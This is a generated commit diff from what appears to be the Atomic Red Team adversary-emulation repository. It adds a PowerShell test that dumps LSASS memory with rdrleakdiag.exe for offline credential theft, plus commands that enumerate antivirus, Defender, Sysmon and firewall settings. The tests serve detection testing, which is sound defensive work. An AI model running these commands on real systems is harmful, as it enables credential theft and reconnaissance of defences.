Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -1309,6 +1309,7 @@ credential-access,T1003.001,OS Credential Dumping: LSASS Memory,9,Create Mini Du
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,11,Dump LSASS with createdump.exe from .Net v5,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
+credential-access,T1003.001,OS Credential Dumping: LSASS Memory,13,Dump LSASS.exe using lolbin rdrleakdiag.exe,47a539d1-61b9-4364-bf49-a68bc2a95ef0,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
 credential-access,T1110.003,Brute Force: Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
@@ -1569,6 +1570,9 @@ discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security S
 discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
 discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
 discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
+discovery,T1518.001,Software Discovery: Security Software Discovery,7,Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets,015cd268-996e-4c32-8347-94c80c6286ee,command_prompt
+discovery,T1518.001,Software Discovery: Security Software Discovery,8,Security Software Discovery - Windows Defender Enumeration,d3415a0e-66ef-429b-acf4-a768876954f6,powershell
+discovery,T1518.001,Software Discovery: Security Software Discovery,9,Security Software Discovery - Windows Firewall Enumeration,9dca5a1d-f78c-4a8d-accb-d6de67cfed6b,powershell
 discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
 discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
 discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -896,6 +896,7 @@ credential-access,T1003.001,OS Credential Dumping: LSASS Memory,9,Create Mini Du
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,11,Dump LSASS with createdump.exe from .Net v5,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
+credential-access,T1003.001,OS Credential Dumping: LSASS Memory,13,Dump LSASS.exe using lolbin rdrleakdiag.exe,47a539d1-61b9-4364-bf49-a68bc2a95ef0,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
 credential-access,T1110.003,Brute Force: Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
@@ -1078,6 +1079,9 @@ discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security S
 discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
 discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
+discovery,T1518.001,Software Discovery: Security Software Discovery,7,Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets,015cd268-996e-4c32-8347-94c80c6286ee,command_prompt
+discovery,T1518.001,Software Discovery: Security Software Discovery,8,Security Software Discovery - Windows Defender Enumeration,d3415a0e-66ef-429b-acf4-a768876954f6,powershell
+discovery,T1518.001,Software Discovery: Security Software Discovery,9,Security Software Discovery - Windows Firewall Enumeration,9dca5a1d-f78c-4a8d-accb-d6de67cfed6b,powershell
 discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
 discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
 discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -2061,6 +2061,7 @@
   - Atomic Test #10: Powershell Mimikatz [windows]
   - Atomic Test #11: Dump LSASS with createdump.exe from .Net v5 [windows]
   - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
+  - Atomic Test #13: Dump LSASS.exe using lolbin rdrleakdiag.exe [windows]
 - T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
   - Atomic Test #1: Password Spray all Domain Users [windows]
@@ -2402,6 +2403,9 @@
   - Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
   - Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
   - Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
+  - Atomic Test #7: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets [windows]
+  - Atomic Test #8: Security Software Discovery - Windows Defender Enumeration [windows]
+  - Atomic Test #9: Security Software Discovery - Windows Firewall Enumeration [windows]
 - [T1526 Cloud Service Discovery](../../T1526/T1526.md)
   - Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1467,6 +1467,7 @@
   - Atomic Test #10: Powershell Mimikatz [windows]
   - Atomic Test #11: Dump LSASS with createdump.exe from .Net v5 [windows]
   - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
+  - Atomic Test #13: Dump LSASS.exe using lolbin rdrleakdiag.exe [windows]
 - T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
   - Atomic Test #1: Password Spray all Domain Users [windows]
@@ -1718,6 +1719,9 @@
   - Atomic Test #2: Security Software Discovery - powershell [windows]
   - Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
   - Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
+  - Atomic Test #7: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets [windows]
+  - Atomic Test #8: Security Software Discovery - Windows Defender Enumeration [windows]
+  - Atomic Test #9: Security Software Discovery - Windows Firewall Enumeration [windows]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
   - Atomic Test #1: Remote System Discovery - net [windows]
   - Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]

atomics/Indexes/index.yaml

@@ -91341,6 +91341,32 @@ credential-access:
           '
         name: powershell
         elevation_required: true
+    - name: Dump LSASS.exe using lolbin rdrleakdiag.exe
+      auto_generated_guid: 47a539d1-61b9-4364-bf49-a68bc2a95ef0
+      description: "The memory of lsass.exe is often dumped for offline credential
+        theft attacks. \nThis can be achieved with lolbin rdrleakdiag.exe. \n\nUpon
+        successful execution, you should see the following files created, $env:TEMP\\minidump_<PID>.dmp
+        and  $env:TEMP\\results_<PID>.hlk.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: "if (Test-Path -Path \"$env:SystemRoot\\System32\\rdrleakdiag.exe\")
+          {\n      $binary_path = \"$env:SystemRoot\\System32\\rdrleakdiag.exe\"\n
+          \ } elseif (Test-Path -Path \"$env:SystemRoot\\SysWOW64\\rdrleakdiag.exe\")
+          {\n      $binary_path = \"$env:SystemRoot\\SysWOW64\\rdrleakdiag.exe\"\n
+          \ } else {\n      $binary_path = \"File not found\"\n      exit 1\n  }\n$lsass_pid
+          = get-process lsass |select -expand id\nif (-not (Test-Path -Path\"$env:TEMP\\t1003.001-13-rdrleakdiag\"))
+          {New-Item -ItemType Directory -Path $env:TEMP\\t1003.001-13-rdrleakdiag
+          -Force} \nwrite-host $binary_path /p $lsass_pid /o $env:TEMP\\t1003.001-13-rdrleakdiag
+          /fullmemdmp /wait 1\n& $binary_path /p $lsass_pid /o $env:TEMP\\t1003.001-13-rdrleakdiag
+          /fullmemdmp /wait 1\nWrite-Host \"Minidump file, minidump_$lsass_pid.dmp
+          can be found inside $env:TEMP\\t1003.001-13-rdrleakdiag directory.\"\n"
+        cleanup_command: 'Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse
+          -Force -ErrorAction Ignore
+
+          '
+        name: powershell
+        elevation_required: true
   T1179:
     technique:
       x_mitre_platforms:
@@ -102713,15 +102739,16 @@ discovery:
       supported_platforms:
       - windows
       executor:
-        command: |
-          netsh.exe advfirewall  show allprofiles
-          tasklist.exe
-          tasklist.exe | findstr /i virus
-          tasklist.exe | findstr /i cb
-          tasklist.exe | findstr /i defender
-          tasklist.exe | findstr /i cylance
-          tasklist.exe | findstr /i mc
-          tasklist.exe | findstr /i "virus cb defender cylance mc"
+        command: "netsh.exe advfirewall  show allprofiles \nnetsh.exe advfirewall
+          firewall dump\nnetsh.exe advfirewall show currentprofile\nnetsh.exe advfirewall
+          firewall show rule name=all\nnetsh.exe firewall show state\nnetsh.exe firewall
+          show config\nsc query windefend\npowershell.exe /c \"Get-Process | Where-Object
+          { $_.ProcessName -eq 'Sysmon' }\"\npowershell.exe /c \"Get-Service | where-object
+          {$_.DisplayName -like '*sysm*'}\"\npowershell.exe /c \"Get-CimInstance Win32_Service
+          -Filter 'Description = ''System Monitor service'''\"\ntasklist.exe\ntasklist.exe
+          | findstr /i virus\ntasklist.exe | findstr /i cb\ntasklist.exe | findstr
+          /i defender\ntasklist.exe | findstr /i cylance\ntasklist.exe | findstr /i
+          mc\ntasklist.exe | findstr /i \"virus cb defender cylance mc\"\n"
         name: command_prompt
     - name: Security Software Discovery - powershell
       auto_generated_guid: 7f566051-f033-49fb-89de-b6bacab730f0
@@ -102742,6 +102769,7 @@ discovery:
           get-process | ?{$_.Description -like "*cylance*"}
           get-process | ?{$_.Description -like "*mc*"}
           get-process | ?{$_.ProcessName -like "*mc*"}
+          get-process | Where-Object { $_.ProcessName -eq "Sysmon" }
         name: powershell
     - name: Security Software Discovery - ps (macOS)
       auto_generated_guid: ba62ce11-e820-485f-9c17-6f3c857cd840
@@ -102794,6 +102822,50 @@ discovery:
           Get displayName /Format:List
         name: command_prompt
         elevation_required: true
+    - name: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject
+        cmdlets
+      auto_generated_guid: 015cd268-996e-4c32-8347-94c80c6286ee
+      description: |
+        Discovery of installed antivirus products via Get-CimInstance and Get-WmiObject cmdlets of powershell.
+
+        when sucessfully executed, information about installed AV software is displayed..
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          powershell Get-CimInstance -Namespace root/securityCenter2 -classname antivirusproduct
+          powershell Get-WmiObject -Namespace root\securitycenter2 -Class antivirusproduct
+        name: command_prompt
+        elevation_required: true
+    - name: Security Software Discovery - Windows Defender Enumeration
+      auto_generated_guid: d3415a0e-66ef-429b-acf4-a768876954f6
+      description: |
+        Windows Defender Enumeration via different built-in windows native tools.
+        when sucessfully executed, information about windows defender is displayed.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Get-Service WinDefend #check the service state of Windows Defender
+          Get-MpComputerStatus #provides the current status of security solution elements, including Anti-Spyware, Antivirus, LoavProtection, Real-time protection, etc
+          Get-MpThreat #threats details that have been detected using MS Defender
+        name: powershell
+        elevation_required: true
+    - name: Security Software Discovery - Windows Firewall Enumeration
+      auto_generated_guid: 9dca5a1d-f78c-4a8d-accb-d6de67cfed6b
+      description: |
+        Enumerates windows firewall to retrieves firewall rules from the target computer.
+
+        when sucessfully executed, details of windows firewall is displayed.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Get-NetFirewallProfile | Format-Table Name, Enabled
+          Get-NetFirewallSetting
+          Get-NetFirewallRule | select DisplayName, Enabled, Description
+        name: powershell
+        elevation_required: true
   T1526:
     technique:
       modified: '2023-05-04T18:01:44.086Z'

atomics/Indexes/windows-index.yaml

@@ -78482,6 +78482,32 @@ credential-access:
           '
         name: powershell
         elevation_required: true
+    - name: Dump LSASS.exe using lolbin rdrleakdiag.exe
+      auto_generated_guid: 47a539d1-61b9-4364-bf49-a68bc2a95ef0
+      description: "The memory of lsass.exe is often dumped for offline credential
+        theft attacks. \nThis can be achieved with lolbin rdrleakdiag.exe. \n\nUpon
+        successful execution, you should see the following files created, $env:TEMP\\minidump_<PID>.dmp
+        and  $env:TEMP\\results_<PID>.hlk.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: "if (Test-Path -Path \"$env:SystemRoot\\System32\\rdrleakdiag.exe\")
+          {\n      $binary_path = \"$env:SystemRoot\\System32\\rdrleakdiag.exe\"\n
+          \ } elseif (Test-Path -Path \"$env:SystemRoot\\SysWOW64\\rdrleakdiag.exe\")
+          {\n      $binary_path = \"$env:SystemRoot\\SysWOW64\\rdrleakdiag.exe\"\n
+          \ } else {\n      $binary_path = \"File not found\"\n      exit 1\n  }\n$lsass_pid
+          = get-process lsass |select -expand id\nif (-not (Test-Path -Path\"$env:TEMP\\t1003.001-13-rdrleakdiag\"))
+          {New-Item -ItemType Directory -Path $env:TEMP\\t1003.001-13-rdrleakdiag
+          -Force} \nwrite-host $binary_path /p $lsass_pid /o $env:TEMP\\t1003.001-13-rdrleakdiag
+          /fullmemdmp /wait 1\n& $binary_path /p $lsass_pid /o $env:TEMP\\t1003.001-13-rdrleakdiag
+          /fullmemdmp /wait 1\nWrite-Host \"Minidump file, minidump_$lsass_pid.dmp
+          can be found inside $env:TEMP\\t1003.001-13-rdrleakdiag directory.\"\n"
+        cleanup_command: 'Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse
+          -Force -ErrorAction Ignore
+
+          '
+        name: powershell
+        elevation_required: true
   T1179:
     technique:
       x_mitre_platforms:
@@ -87845,15 +87871,16 @@ discovery:
       supported_platforms:
       - windows
       executor:
-        command: |
-          netsh.exe advfirewall  show allprofiles
-          tasklist.exe
-          tasklist.exe | findstr /i virus
-          tasklist.exe | findstr /i cb
-          tasklist.exe | findstr /i defender
-          tasklist.exe | findstr /i cylance
-          tasklist.exe | findstr /i mc
-          tasklist.exe | findstr /i "virus cb defender cylance mc"
+        command: "netsh.exe advfirewall  show allprofiles \nnetsh.exe advfirewall
+          firewall dump\nnetsh.exe advfirewall show currentprofile\nnetsh.exe advfirewall
+          firewall show rule name=all\nnetsh.exe firewall show state\nnetsh.exe firewall
+          show config\nsc query windefend\npowershell.exe /c \"Get-Process | Where-Object
+          { $_.ProcessName -eq 'Sysmon' }\"\npowershell.exe /c \"Get-Service | where-object
+          {$_.DisplayName -like '*sysm*'}\"\npowershell.exe /c \"Get-CimInstance Win32_Service
+          -Filter 'Description = ''System Monitor service'''\"\ntasklist.exe\ntasklist.exe
+          | findstr /i virus\ntasklist.exe | findstr /i cb\ntasklist.exe | findstr
+          /i defender\ntasklist.exe | findstr /i cylance\ntasklist.exe | findstr /i
+          mc\ntasklist.exe | findstr /i \"virus cb defender cylance mc\"\n"
         name: command_prompt
     - name: Security Software Discovery - powershell
       auto_generated_guid: 7f566051-f033-49fb-89de-b6bacab730f0
@@ -87874,6 +87901,7 @@ discovery:
           get-process | ?{$_.Description -like "*cylance*"}
           get-process | ?{$_.Description -like "*mc*"}
           get-process | ?{$_.ProcessName -like "*mc*"}
+          get-process | Where-Object { $_.ProcessName -eq "Sysmon" }
         name: powershell
     - name: Security Software Discovery - Sysmon Service
       auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
@@ -87902,6 +87930,50 @@ discovery:
           Get displayName /Format:List
         name: command_prompt
         elevation_required: true
+    - name: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject
+        cmdlets
+      auto_generated_guid: 015cd268-996e-4c32-8347-94c80c6286ee
+      description: |
+        Discovery of installed antivirus products via Get-CimInstance and Get-WmiObject cmdlets of powershell.
+
+        when sucessfully executed, information about installed AV software is displayed..
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          powershell Get-CimInstance -Namespace root/securityCenter2 -classname antivirusproduct
+          powershell Get-WmiObject -Namespace root\securitycenter2 -Class antivirusproduct
+        name: command_prompt
+        elevation_required: true
+    - name: Security Software Discovery - Windows Defender Enumeration
+      auto_generated_guid: d3415a0e-66ef-429b-acf4-a768876954f6
+      description: |
+        Windows Defender Enumeration via different built-in windows native tools.
+        when sucessfully executed, information about windows defender is displayed.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Get-Service WinDefend #check the service state of Windows Defender
+          Get-MpComputerStatus #provides the current status of security solution elements, including Anti-Spyware, Antivirus, LoavProtection, Real-time protection, etc
+          Get-MpThreat #threats details that have been detected using MS Defender
+        name: powershell
+        elevation_required: true
+    - name: Security Software Discovery - Windows Firewall Enumeration
+      auto_generated_guid: 9dca5a1d-f78c-4a8d-accb-d6de67cfed6b
+      description: |
+        Enumerates windows firewall to retrieves firewall rules from the target computer.
+
+        when sucessfully executed, details of windows firewall is displayed.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Get-NetFirewallProfile | Format-Table Name, Enabled
+          Get-NetFirewallSetting
+          Get-NetFirewallRule | select DisplayName, Enabled, Description
+        name: powershell
+        elevation_required: true
   T1526:
     technique:
       modified: '2023-05-04T18:01:44.086Z'

atomics/T1003.001/T1003.001.md

@@ -54,6 +54,8 @@ The following SSPs can be used to access credentials:
 
 - [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
 
+- [Atomic Test #13 - Dump LSASS.exe using lolbin rdrleakdiag.exe](#atomic-test-13---dump-lsassexe-using-lolbin-rdrleakdiagexe)
+
 
 <br/>
 
@@ -650,4 +652,51 @@ Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #13 - Dump LSASS.exe using lolbin rdrleakdiag.exe
+The memory of lsass.exe is often dumped for offline credential theft attacks. 
+This can be achieved with lolbin rdrleakdiag.exe. 
+
+Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and  $env:TEMP\results_<PID>.hlk.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 47a539d1-61b9-4364-bf49-a68bc2a95ef0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
+      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
+  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
+      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
+  } else {
+      $binary_path = "File not found"
+      exit 1
+  }
+$lsass_pid = get-process lsass |select -expand id
+if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
+write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
+& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
+Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

atomics/T1518.001/T1518.001.md

@@ -20,6 +20,12 @@ Adversaries may also utilize cloud APIs to discover the configurations of firewa
 
 - [Atomic Test #6 - Security Software Discovery - AV Discovery via WMI](#atomic-test-6---security-software-discovery---av-discovery-via-wmi)
 
+- [Atomic Test #7 - Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets](#atomic-test-7---security-software-discovery---av-discovery-via-get-ciminstance-and-get-wmiobject-cmdlets)
+
+- [Atomic Test #8 - Security Software Discovery - Windows Defender Enumeration](#atomic-test-8---security-software-discovery---windows-defender-enumeration)
+
+- [Atomic Test #9 - Security Software Discovery - Windows Firewall Enumeration](#atomic-test-9---security-software-discovery---windows-firewall-enumeration)
+
 
 <br/>
 
@@ -43,7 +49,16 @@ and specific security software.
 
 
 ```cmd
-netsh.exe advfirewall  show allprofiles
+netsh.exe advfirewall  show allprofiles 
+netsh.exe advfirewall firewall dump
+netsh.exe advfirewall show currentprofile
+netsh.exe advfirewall firewall show rule name=all
+netsh.exe firewall show state
+netsh.exe firewall show config
+sc query windefend
+powershell.exe /c "Get-Process | Where-Object { $_.ProcessName -eq 'Sysmon' }"
+powershell.exe /c "Get-Service | where-object {$_.DisplayName -like '*sysm*'}"
+powershell.exe /c "Get-CimInstance Win32_Service -Filter 'Description = ''System Monitor service'''"
 tasklist.exe
 tasklist.exe | findstr /i virus
 tasklist.exe | findstr /i cb
@@ -89,6 +104,7 @@ get-process | ?{$_.Description -like "*defender*"}
 get-process | ?{$_.Description -like "*cylance*"}
 get-process | ?{$_.Description -like "*mc*"}
 get-process | ?{$_.ProcessName -like "*mc*"}
+get-process | Where-Object { $_.ProcessName -eq "Sysmon" }
 ```
 
 
@@ -214,4 +230,98 @@ wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets
+Discovery of installed antivirus products via Get-CimInstance and Get-WmiObject cmdlets of powershell.
+
+when sucessfully executed, information about installed AV software is displayed..
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 015cd268-996e-4c32-8347-94c80c6286ee
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+powershell Get-CimInstance -Namespace root/securityCenter2 -classname antivirusproduct
+powershell Get-WmiObject -Namespace root\securitycenter2 -Class antivirusproduct
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Security Software Discovery - Windows Defender Enumeration
+Windows Defender Enumeration via different built-in windows native tools.
+when sucessfully executed, information about windows defender is displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d3415a0e-66ef-429b-acf4-a768876954f6
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Get-Service WinDefend #check the service state of Windows Defender
+Get-MpComputerStatus #provides the current status of security solution elements, including Anti-Spyware, Antivirus, LoavProtection, Real-time protection, etc
+Get-MpThreat #threats details that have been detected using MS Defender
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Security Software Discovery - Windows Firewall Enumeration
+Enumerates windows firewall to retrieves firewall rules from the target computer.
+
+when sucessfully executed, details of windows firewall is displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9dca5a1d-f78c-4a8d-accb-d6de67cfed6b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Get-NetFirewallProfile | Format-Table Name, Enabled
+Get-NetFirewallSetting
+Get-NetFirewallRule | select DisplayName, Enabled, Description
+```
+
+
+
+
+
+
 <br/>